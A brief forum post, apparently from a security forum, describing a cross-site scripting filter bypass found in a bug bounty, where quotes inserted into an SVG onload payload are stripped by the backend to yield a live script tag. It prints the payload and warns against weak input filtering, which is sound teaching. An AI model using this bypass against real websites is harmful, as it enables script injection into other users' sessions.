Found an XSS bypass during a bug bounty

x32x01
  • by x32x01 ||
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>
🚨 Never Rely on Poor Input Filtering !
Found an XSS bypass during a bug bounty
 
Related Threads
x32x01
Replies
0
Views
218
x32x01
x32x01
x32x01
Replies
0
Views
765
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
953
x32x01
x32x01
x32x01
Replies
0
Views
214
x32x01
x32x01
x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Replies
0
Views
245
x32x01
x32x01
x32x01
Replies
0
Views
758
x32x01
x32x01
x32x01
Replies
0
Views
944
x32x01
x32x01
x32x01
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Replies
0
Views
768
x32x01
x32x01
Register & Login Faster
Forgot your password?
Forum Statistics
Threads
654
Messages
657
Members
66
Latest Member
medhatmalak
Back
Top